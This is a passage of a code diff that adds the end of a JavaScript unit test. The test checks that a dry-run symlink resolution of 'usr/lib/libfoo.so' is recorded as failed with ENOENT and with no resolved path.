+      const symlinkActivity = getRecordedActivities().find(
+        (activity) => activity.kind === "symlink-resolution",
+      );
+      assert.ok(symlinkActivity);
+      assert.strictEqual(symlinkActivity.target, "usr/lib/libfoo.so");
+      assert.strictEqual(symlinkActivity.errorCode, "ENOENT");
+      assert.strictEqual(symlinkActivity.traceDetail, undefined);
+      assert.strictEqual(symlinkActivity.resolvedPath, undefined);
+      assert.strictEqual(symlinkActivity.status, "failed");
+    } finally {
+      setDryRunMode(false);
+      resetRecordedActivities();
+    }
+  });
 });